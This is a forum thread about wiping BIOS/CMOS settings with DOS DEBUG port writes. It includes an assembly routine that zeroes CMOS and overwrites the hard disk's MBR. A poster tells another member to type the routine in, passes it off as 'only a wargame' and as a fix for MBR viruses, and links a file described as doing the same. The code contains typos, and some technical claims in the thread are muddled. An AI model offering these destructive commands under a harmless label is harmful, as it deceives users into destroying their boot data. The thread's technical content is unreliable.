Thread: Erase BIOS contents

Talking Erase BIOS contents

Enter the commands in the Dos prompt

DEBUG
    -o 70 2e
    -o 71 ff
    -q

VOILA !! ... AllZ HISTORY .

Exactly why would you do this...? and how would you get new contents for the BIOS then?

Hmmm... i know people who keep passwords right in the booting start up... The password and all the other " NOT SO IMPORTANT" contents can be erased with these commands .The BIOS settings can be manually configured again !!!

If I have set a power on password in the BIOS, how do I get to the DOS prompt in the first place?

The machine will run setup before DOS so why not just set factory defaults reboot and start again?

Am I missing something here?

Cheers

Yes, that's my CC number! 576869746568617's Avatar

Question Umm......

That's funny.........All you did was moved two bytes, then exited....nothing executes....which means nothing happens.

Actually, the correct syntax would be:

debug
    -a
    -mov ax,0
    -mov ax,cx
    -out 70,al
    -mov ax,0
    -out 71,al
    -inc cx
    -cmp cx,100
    -jb 103
    -int 20
    <enter> Note: Blank line
    -g
    -q

You might want to read a debug tutorial and learn some assembler. A good one is here.

or better yet why don't I teach you an assembler lesson, Waveshifter:

Type this in to erase your BIOS and both copies of the MBR on your HDD: (don't worry....it's only a wargame )

debug
    -fcs:200 400 0
    -acs:100
    -xxxx:0100 mov ax, 0
    -xxxx:0103 mov ax, cx
    -xxxx:0105 out 70, al
    -xxxx:0107 mov ax, 0
    -xxxx:010a out 71,al
    -xxxx:010c inc cx
    -xxxx:010d cmp cx,100
    -xxxx:0111 jb 103
    -xxxx:0113 mov ax,302
    -xxxx:0116 mov bx,200
    -xxxx:0119 mov cx,1
    -xxxx:011c mov dx,80
    -xxxx:011f int 13
    -xxxx:012l int 20
    -xxxx:0123
    -g
    -q

This is really good to use if your computer is infected with an MBR virus.

I know assembler real good
    Windows 9x: n. A collection of 32 bit extensions and a graphical shell for a 16 bit patch to an 8 bit operating system originally coded for a 4 bit microprocessor. Written by a 2 bit company that can\'t stand 1 bit of competition.

Here's a better one:

Click here to erase your BIOS and delete your HDD's MBR (Don't Worry...Just a Wargame )

Disclaimer: If you are stupid enough to download, extract, and execute the file in the above link or attachment below, you are an idiot and deserve what happens! I, nor anyone else shall assume absolutely any responsibility for your stupidity! Repeat: I will NOT be held responsible for your actions! Use at your own risk!
    Windows 9x: n. A collection of 32 bit extensions and a graphical shell for a 16 bit patch to an 8 bit operating system originally coded for a 4 bit microprocessor. Written by a 2 bit company that can\'t stand 1 bit of competition.

Heee Hee!

Attached is a "benign version"

It is a zipped .exe file which I have checked very carefully...........On running it you will find that your pointer has turned into a gunsight, and that there are two rodents running across your screen............just shoot one and let go of your mouse......don't touch the keyboard either.........hint: the projectile is quite slow so you will have to take a lead on the target.

It will run on 3.1x (it is that old!!!), 95/98/98se and I have just tested it on XP (SP1)

At the end you get an advert for the website of a Dutch Finance House (I think) hitting a key or moving the mouse gets rid of it, so you should not do this until it has finished.

Enjoy!

Not quite a "wargame" but shooting and projectiles are involved

Talking

I'll bet your tomcat just loves that one!

Yeah.........he looks at the mice, but doesn't understand the spoofed messages
    Hey 576869746568617 I hope that you tried it?

I did! That was hilarious! I had forgotten how ugly the Windows 3.1 message boxes were!